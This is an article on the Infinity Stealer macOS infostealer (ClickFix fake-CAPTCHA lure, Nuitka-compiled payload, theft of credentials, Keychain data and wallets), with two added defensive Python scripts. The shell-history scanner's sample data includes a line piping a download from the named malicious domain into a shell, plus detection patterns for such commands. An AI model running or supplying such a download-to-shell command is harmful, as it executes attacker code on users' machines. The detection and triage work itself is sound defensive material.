Cyber threats against macOS users have risen again with the emergence of a new information-stealing malware called Infinity Stealer. The malware uses increasingly sophisticated techniques, in particular Python scripts compiled into native executables with the open-source compiler Nuitka.
This approach makes the malware harder to detect than traditional packaging methods and marks a further evolution in attacks against Apple systems.
The Fake CAPTCHA Lure
The Infinity Stealer attack begins with the ClickFix technique, which displays a fake CAPTCHA that mimics Cloudflare’s human verification. Victims are redirected to a malicious site such as update-check[.]com and asked to execute a specific command in the macOS Terminal.
Instead of completing a verification step, users unknowingly execute an obfuscated malicious command. This command downloads a follow-up script that serves as the malware’s entry point onto the system.
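The paste-and-run step described above leaves a trace in the victim's shell history, which is one place a responder can look for it. The following scanner is an added example for this article, not code from Malwarebytes or from the malware: it reads lines shaped like zsh history and flags commands that decode base64 into a shell, pipe a download straight into a shell, or fetch from a watch-listed domain. The rule names, the watch-list handling, and the sample history lines (including the harmless base64 payload) are constructed here; the only domain in the watch list is the one named in the article.

```python
"""Flag shell-history entries that look like a ClickFix-style paste-and-run.

Added example for this article, not code from Malwarebytes or from the malware.
It reads lines shaped like zsh/bash history and flags commands that decode
base64 into a shell, pipe a download straight into sh/bash/zsh, evaluate
decoded text, or fetch from a watch-listed domain. The rule names, the
watch-list handling and the sample history lines are constructed here.
"""
import base64
import re
from typing import Dict, List, Optional

# The only domain named in the article, kept defanged in the list and refanged
# for matching; a real deployment would load this from threat intel.
WATCHLIST_DOMAINS = {d.replace("[.]", ".") for d in ("update-check[.]com",)}

# Heuristic rules: (label, compiled regex).
RULES = [
    ("base64_to_shell", re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(sh|bash|zsh)\b")),
    ("download_to_shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh)\b")),
    ("eval_of_decoded", re.compile(r"\beval\b.*base64")),
]

# zsh EXTENDED_HISTORY prefix, e.g. ": 1700000000:0;cmd".
ZSH_EXT = re.compile(r"^: \d+:\d+;")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/=]{16,}")


def normalize(line: str) -> str:
    """Strip the zsh timestamp prefix and surrounding whitespace."""
    return ZSH_EXT.sub("", line).strip()


def decode_embedded_base64(cmd: str) -> Optional[str]:
    """Return the first long base64 token that decodes to UTF-8 text, for analyst context."""
    for tok in B64_TOKEN.findall(cmd):
        try:
            return base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def classify(line: str) -> List[str]:
    """Return the labels of every rule the command triggers, in rule order."""
    cmd = normalize(line)
    hits = [label for label, rx in RULES if rx.search(cmd)]
    if any(h.lower() in WATCHLIST_DOMAINS for h in URL_HOST.findall(cmd)):
        hits.append("watchlist_domain")
    return hits


def scan_history(lines: List[str]) -> List[Dict]:
    """Scan history lines and return one finding per suspicious command."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            cmd = normalize(line)
            findings.append({"line": n, "command": cmd, "rules": hits,
                             "decoded": decode_embedded_base64(cmd)})
    return findings


# Constructed sample history. The base64 payload is harmless ("echo sample") and
# is built here so the fixture stays readable.
SAMPLE_PAYLOAD = base64.b64encode(b"echo sample").decode()
SAMPLE_HISTORY = [
    ": 1700000000:0;ls -la ~/Downloads",
    ": 1700000060:0;git pull --rebase",
    f": 1700000120:0;echo {SAMPLE_PAYLOAD} | base64 -d | sh",
    ": 1700000180:0;curl -fsSL https://update-check.com/verify | sh",
    ": 1700000240:0;brew install jq",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['rules']} :: {f['command']}")
        if f["decoded"]:
            print(f"    decodes to: {f['decoded']!r}")
```

To run it against a real machine, read `~/.zsh_history` (or `~/.bash_history`) with `open(path, errors="replace")` and pass the lines to `scan_history`; the decoded payload is surfaced so an analyst can see what the victim actually ran without executing anything. Expect to tune the rules, since developers legitimately pipe installers into a shell.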
According to Malwarebytes researchers, this is the first campaign on macOS to combine the ClickFix technique with a Python-based infostealer compiled with Nuitka.
Harder to Detect Thanks to Nuitka
Unlike PyInstaller, which bundles Python bytecode inside the executable, Nuitka translates Python code to C and produces a native binary. The resulting file contains no easily recoverable Python bytecode.
As a result, detection by security products is harder, and reverse engineering by researchers requires considerably more effort.
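The difference the previous two paragraphs describe is visible in the raw bytes of a sample, which is why analysts start triage by looking for packager fingerprints. The following script is an added example for this article, not Malwarebytes' tooling: it checks the Mach-O magic, then searches for marker strings. The PyInstaller cookie magic and the `PYZ-00.pyz` archive name are PyInstaller bootloader constants; the Nuitka markers (`NUITKA_ONEFILE_PARENT` and the substring `nuitka`) are assumptions about strings the Nuitka onefile bootstrap leaves in its output. The sample inputs are constructed in-file and are not real binaries.

```python
"""Triage a Mach-O file for Python-packaging fingerprints (PyInstaller vs Nuitka).

Added example for this article, not Malwarebytes' tooling. It checks the Mach-O
magic, then searches the raw bytes for packager markers. The PyInstaller cookie
magic and the 'PYZ-00.pyz' archive name are PyInstaller bootloader constants;
the Nuitka markers ('NUITKA_ONEFILE_PARENT' and the substring 'nuitka') are
assumptions about strings the Nuitka onefile bootstrap leaves in its output.
The sample inputs are constructed in-file and are not real binaries.
"""
import sys
from typing import Dict, List

MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit, big / little endian
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit
    b"\xca\xfe\xba\xbe",                       # fat / universal
}
PYINSTALLER_MARKERS = [b"MEI\x0c\x0b\x0a\x0b\x0e", b"PYZ-00.pyz"]
NUITKA_MARKERS = [b"NUITKA_ONEFILE_PARENT", b"nuitka"]  # assumed fingerprints
PYTHON_RUNTIME_MARKERS = [b"libpython3", b"Py_Initialize"]


def found(markers: List[bytes], blob: bytes) -> List[str]:
    """Return the markers present in blob (case-insensitive), as printable strings."""
    low = blob.lower()
    return [m.decode("latin-1") for m in markers if m.lower() in low]


def triage(blob: bytes) -> Dict:
    """Classify a file image by packager fingerprints and return the evidence."""
    result = {"is_macho": blob[:4] in MACHO_MAGICS, "pyinstaller": [], "nuitka": [],
              "python_runtime": [], "verdict": "not-macho"}
    if not result["is_macho"]:
        return result
    result["pyinstaller"] = found(PYINSTALLER_MARKERS, blob)
    result["nuitka"] = found(NUITKA_MARKERS, blob)
    result["python_runtime"] = found(PYTHON_RUNTIME_MARKERS, blob)
    if result["pyinstaller"]:
        # A bytecode archive is present: unpacking and decompiling the .pyc files applies.
        result["verdict"] = "pyinstaller"
    elif result["nuitka"]:
        # No bytecode archive to recover: analyse as native code (the article's point).
        result["verdict"] = "nuitka"
    elif result["python_runtime"]:
        # Links a CPython runtime but shows neither packager's markers.
        result["verdict"] = "python-runtime-unknown-packer"
    else:
        result["verdict"] = "no-python-markers"
    return result


def fake_macho(*strings: bytes) -> bytes:
    """Build a constructed stand-in: 64-bit Mach-O magic, padding, NUL-separated strings."""
    return b"\xcf\xfa\xed\xfe" + b"\x00" * 28 + b"\x00".join(strings) + b"\x00"


# Constructed samples, not real binaries.
SAMPLE_PYINSTALLER = fake_macho(b"libpython3.12.dylib", b"PYZ-00.pyz", b"MEI\x0c\x0b\x0a\x0b\x0e")
SAMPLE_NUITKA = fake_macho(b"libpython3.12.dylib", b"NUITKA_ONEFILE_PARENT", b"__nuitka_module_loader")
SAMPLE_NATIVE = fake_macho(b"/usr/lib/libSystem.B.dylib")
SAMPLE_SCRIPT = b"#!/bin/sh\necho not a binary\n"

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            r = triage(fh.read())
        print(path, r["verdict"], r["pyinstaller"], r["nuitka"], r["python_runtime"])
```

Run it with one or more file paths as arguments. A `pyinstaller` verdict means the original Python source is usually recoverable from the embedded archive; a `nuitka` verdict means there is no such archive, and the sample has to be worked through as compiled C, which is what makes the Infinity Stealer payload more expensive to analyse.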
“The final payload is written in Python and compiled with Nuitka, resulting in a native macOS binary that is more difficult to explain,” Malwarebytes stated.
How It Works and Targeted Data
After gaining a foothold on the system, the malware performs several steps before activating its main function. Infinity Stealer first checks whether it is running in a sandbox or virtual machine, so as to evade analysis.
If it passes, the malware begins collecting various sensitive data, including:
- Credentials from Chromium-based browsers and Firefox
- macOS Keychain data
- Cryptocurrency wallets
- Developer files such as .env files containing secrets
Furthermore, the malware is capable of taking screenshots of the victim’s device. All collected data is then sent to a command-and-control (C2) server via HTTP POST, and the attacker receives a notification via Telegram.
A Real Threat to macOS Users
The emergence of Infinity Stealer demonstrates that macOS is no longer “immune” to sophisticated attacks. Social engineering techniques such as fake CAPTCHAs are a major weak point because they exploit user inattention rather than flaws in the system itself.
Users are advised not to copy and run commands in Terminal, especially commands from unknown websites or commands they do not fully understand.
Infinity Stealer is evidence that threats to macOS are increasingly complex and targeted. Using a combination of social engineering techniques and advanced compilation technology, this malware is able to bypass multiple layers of protection.
User vigilance remains the primary line of defense. Understanding the risks and being wary of suspicious instructions are simple yet crucial steps to maintaining data security in the digital age.